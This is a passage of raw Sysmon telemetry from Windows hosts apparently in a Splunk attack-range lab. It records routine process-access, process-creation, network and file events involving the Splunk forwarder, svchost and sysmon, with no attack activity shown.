Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000018038Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.505{E5A8D418-E5B4-63C7-2B02-00000000B002}39122720C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018037Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B4-63C7-2B02-00000000B002}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018036Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018035Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018034Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018033Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018032Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018031Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018030Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018029Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018028Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018027Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5B4-63C7-2B02-00000000B002}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018026Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.333{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B4-63C7-2B02-00000000B002}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018025Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.334{E5A8D418-E5B4-63C7-2B02-00000000B002}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000018024Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.980{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50160-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000018053Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:33.112{E5A8D418-E5B4-63C7-2C02-00000000B002}27002580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B5-63C7-7706-00000000AF02}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E5B5-63C7-7706-00000000AF02}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.766{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B5-63C7-7706-00000000AF02}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.767{FE4C2B44-E5B5-63C7-7706-00000000AF02}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.203{FE4C2B44-E5B5-63C7-7606-00000000AF02}42125804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.168{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1BB989B730455DED047A8984D7C009B,SHA256=B15BE3B93E33F08EA0214E24E182CCCB8649B72BB1B290E1BB19A98837F2B65B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B5-63C7-7606-00000000AF02}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 